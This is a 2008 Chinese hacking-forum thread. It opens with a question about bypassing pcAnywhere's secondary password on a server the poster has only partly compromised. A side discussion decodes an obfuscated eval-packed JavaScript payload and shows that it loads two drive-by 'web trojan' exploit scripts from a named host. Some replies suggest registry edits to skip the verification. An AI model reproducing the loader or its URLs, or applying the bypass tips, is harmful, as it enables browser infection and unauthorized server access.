Board logo

标题: [讨论]pcanywhere二次验证密码存放在哪? [打印本页]

作者: valen886    时间: 2008-7-25 13:50     标题: [讨论]pcanywhere二次验证密码存放在哪?

[讨论]pcanywhere二次验证密码存放在哪?
议题作者:hackest
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

大家都知道pcanywhere是一个远程管理服务器的工具
但是在渗透中如何遇到服务器处于锁定状态
而我们又没有管理员权限的时候
也就是只拿到了pcanywhere的连接密码
却没有系统用户和密码
处于锁定状态的问题以前讨论过了
不过解决的方法貌似不太完美和实际

而且pcanywhere在连接上的时候即使没有管理员权限
也可以直接重启服务器
不过如果想要执行传送文件或者执行命令之类的操作就会要求进行二次验证
这个密码和pcanywhere的连接密码试了很多都没有发现相同的
不知道它的密码存放在哪里
总之找遍了*.cif文件所得的密码都无法通过验证!
难道是要求验证系统用户?!
希望大家讨论下,指点下小弟,嘿嘿My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经


寂寞宝贝
荣誉会员

作者: 虎儿    时间: 2008-7-25 13:50

二次验证密码?不会呀!我要传的话他直接让我输系统的.........成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料TOP 爱要怎么说出口

抗战二十年
晶莹剔透§烈日灼然
作者: 小小夏    时间: 2008-7-25 13:50

兄弟借个地方用一下 因为我不能发贴 谢谢!
--------------------------------------------------------
谁能帮我解密这段代码

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?&#39;&#39;:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!&#39;&#39;.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return&#39;\\w+&#39;};c=1};while(c--)if(k[c])p=p.replace(new RegExp(&#39;\\b&#39;+e(c)+&#39;\\b&#39;,&#39;g&#39;),k[c]);return p}(&#39;A("\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\v")&#39;,37,37,&#39;164|42|163|57|143|162|157|151|160|156|56|134|11|145|167|155|76|74|12|15|75|40|146|165|152|113|61|71|72|150|53|51|50|144|116|126|eval&#39;.split(&#39;|&#39;),0,{}))

代码地址 http://7y7.us/2.js不经风雨,怎见彩虹?
帖子30 精华0 积分68 阅读权限40 性别男 在线时间31 小时 注册时间2006-10-11 最后登录2008-4-26 查看详细资料TOP 少女暴富的隐秘(图)

netpatch
荣誉会员

作者: 阿翠    时间: 2008-7-25 13:50

第一层加密
解后
eval("\151\156\146\157\40\75\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\126\145\162\156\165\155\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\11\53\42\134\156\42\53\15\12\11\11\42\74\163\143\162\151\160\164\40\163\162\143\75\134\42\150\164\164\160\72\57\57\167\163\71\61\56\143\157\155\57\157\113\57\116\145\167\56\152\163\134\42\76\74\57\163\143\162\151\160\164\76\42\15\12\15\12\144\157\143\165\155\145\156\164\56\167\162\151\164\145\50\151\156\146\157\51")
第二层加密
解后
info =    "<script src=\"http://ws91.com/oK/Vernum.js\"></script>"  +"\n"+
    "<script src=\"http://ws91.com/oK/New.js\"></script>"

document.write(info)

ANI网马!通往胜利的路不只一条!
帖子89 精华4 积分3262 阅读权限100 在线时间212 小时 注册时间2005-3-23 最后登录2008-7-2 查看详细资料TOP

netpatch
荣誉会员

作者: 凡人    时间: 2008-7-25 13:50

http://ws91.com/oK/Vernum.js //014网马
http://ws91.com/oK/New.js //ANI网马通往胜利的路不只一条!
帖子89 精华4 积分3262 阅读权限100 在线时间212 小时 注册时间2005-3-23 最后登录2008-7-2 查看详细资料TOP 少女暴富的隐秘(图)

vikxeo
荣誉会员

作者: wwgywl    时间: 2008-7-25 13:50

alert 再 八进制 就ok
帖子58 精华2 积分182 阅读权限100 性别男 在线时间283 小时 注册时间2005-8-14 最后登录2008-6-6 查看详细资料TOP 良辰择日,预测咨询,公司改名,权威易经

huangqing
晶莹剔透§烈日灼然
作者: betty    时间: 2008-7-25 13:50

七贱的,,
他那个网马生成的密码,
搞笑死了,
不知道你知道不知道密码,密码是wokankan
有需要的可以去
偶不是罐水哦

帖子13 精华0 积分48 阅读权限40 性别男 在线时间83 小时 注册时间2007-1-10 最后登录2008-7-23 查看详细资料TOP 让女孩一夜变的更有女人味

hackest
运维管理组

作者: BG7LHT    时间: 2008-7-25 13:50

我汗,我的问题没解决
倒解决了你的问题,晕哦
正所谓强宾不压主  My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

ttfct
荣誉会员

作者: 网飞鸿    时间: 2008-7-25 13:50

跑题了,晕猪,回答的毛的问题哦!

管理员都不看一下索?TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4349 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-20 查看详细资料TOP

hackest
运维管理组

作者: Cici    时间: 2008-7-25 13:50

貌似那个不叫二次加密咧
据说就是系统的密码,晕哦!
那岂不是没戏了,郁闷  My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

hhiijj123
晶莹剔透§烈日灼然
作者: 马自达    时间: 2008-7-25 13:50

引用:
引用第9楼hackest于2007-04-19 16:42发表的 :
貌似那个不叫二次加密咧
据说就是系统的密码,晕哦!
那岂不是没戏了,郁闷  
是啊 就是系统密码 没有听说什么二次加密的DD
帖子2 精华0 积分9 阅读权限40 性别男 在线时间4 小时 注册时间2006-8-23 最后登录2007-4-19 查看详细资料TOP

陆羽
荣誉会员

作者: 5000564    时间: 2008-7-25 13:50

引用:
引用第6楼huangqing于2007-04-19 16:10发表的 :
七贱的,,
他那个网马生成的密码,
搞笑死了,
不知道你知道不知道密码,密码是wokankan
有需要的可以去
.......
楼上不好意思
人家换密码了~.
呵呵
现在是nikankan
帖子11 精华0 积分38 阅读权限100 在线时间14 小时 注册时间2005-12-22 最后登录2008-7-8 查看详细资料TOP

heiye88
晶莹剔透§烈日灼然
作者: dghgs    时间: 2008-7-25 13:50

写个解密页面吧。。。大大们。。。ALERT出来后的数据如何能复制呀。。。比如alert("aaa") 弹出对话框呀。。如何把弹出来的数据复制出来。。谢谢。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

heiye88
晶莹剔透§烈日灼然
作者: 小树    时间: 2008-7-25 13:50

<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>



就会弹出对话框告诉你解密后的结果!
如何保存这个结果呀。。。。。。。。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

kiss8888
晶莹剔透§烈日灼然
作者: 凯旋归来    时间: 2008-7-25 13:50

引用:
引用第3楼netpatch于2007-04-19 14:07发表的 :
第一层加密
解后
eval("151156146157407511114274163143162151160164401631621437513442150164164160725757167163716156143157155571571135712614516215616515556152163134427674571631431621511601647642115342134156425315121111427416314316215116016440163162143751344215016416416072575716716371615614315715557157113571161451675615216313442767457163143162151160164764215121512144157143165155145156164561671621511641455015115614615751")
第二层加密
解后
.......
俺是一个菜鸟,请问:\\7\\9\\m\\6\\l\\k\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\z\\d\\5\\9\\n\\f\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\c\\u\\1\\b\\9\\1\\u\\j\\i\\c\\c\\1\\h\\2\\4\\5\\7\\8\\0\\l\\2\\5\\4\\k\\b\\1\\t\\0\\0\\8\\s\\3\\3\\e\\2\\r\\q\\a\\4\\6\\f\\3\\6\\p\\3\\y\\d\\e\\a\\o\\2\\b\\1\\g\\h\\3\\2\\4\\5\\7\\8\\0\\g\\1\\j\\i\\j\\i\\x\\6\\4\\n\\f\\d\\9\\0\\a\\e\\5\\7\\0\\d\\w\\7\\9\\m\\6\\“
这是用什么工具加密的?谢谢。
帖子1 精华0 积分9 阅读权限40 在线时间7 小时 注册时间2007-2-21 最后登录2008-7-4 查看详细资料TOP

heiye88
晶莹剔透§烈日灼然
作者: callach    时间: 2008-7-25 13:50

顶!<SCRIPT LANGUAGE="JavaScript">
alert("\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B")
</SCRIPT>



就会弹出对话框告诉你解密后的结果!
如何保存这个结果呀。。。。。。。。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

hackest
运维管理组

作者: 飞翔吧    时间: 2008-7-25 13:50

那个是转换过的十六进制数啦
\x61\x6C\x65\x72\x74\x28\x22\u9ED1\u5BA2\u9632\u7EBF\x22\x29\x3B
这些是十六进制形式的了!My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

heiye88
晶莹剔透§烈日灼然
作者: fulu    时间: 2008-7-25 13:50

楼上的你没看明白我的意思呵呵。。我是说如何将alert后的结果保存出来...他是个对话框。。。如何复制出来解密后的数据。。。
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

寂寞宝贝
荣誉会员

作者: 伤人    时间: 2008-7-25 13:50

我R./........你们搞什么飞机,看清楚这个论题,这不是解密的................要研究专门开个帖子,害得我还以为有牛人弄出那什么二次密码了!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料TOP

hackest
运维管理组

作者: zhcaihhhh    时间: 2008-7-25 13:50

我也晕了啦
发个帖子被借掉了
下次不敢发了…… My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

heiye88
晶莹剔透§烈日灼然
作者: fulu    时间: 2008-7-25 13:50

修改注册表..不使用2次密码
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料TOP

平安年间
晶莹剔透§烈日灼然
作者: 大头虾    时间: 2008-7-25 13:50

我这也有个问题,如果被控端修改了pcanywhere的默认连接端口,保存在哪里?
如果是保存在cif文件里,那么如何才能读取出来?并非高手

帖子62 精华2 积分245 阅读权限40 性别男 在线时间11 小时 注册时间2006-10-3 最后登录2008-5-13 查看个人网站
查看详细资料TOP

hackest
运维管理组

作者: wwgywl    时间: 2008-7-25 13:50

端口貌似是写进注册表的吧 My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/

帖子882 精华20 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 查看个人网站
查看详细资料TOP

平安年间
晶莹剔透§烈日灼然
作者: Alice    时间: 2008-7-25 13:50

谢楼上的啦,可惜我遇的那个服务器比较变态,可能没有权限读注册表并非高手

帖子62 精华2 积分245 阅读权限40 性别男 在线时间11 小时 注册时间2006-10-3 最后登录2008-5-13 查看个人网站
查看详细资料TOP

remax
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2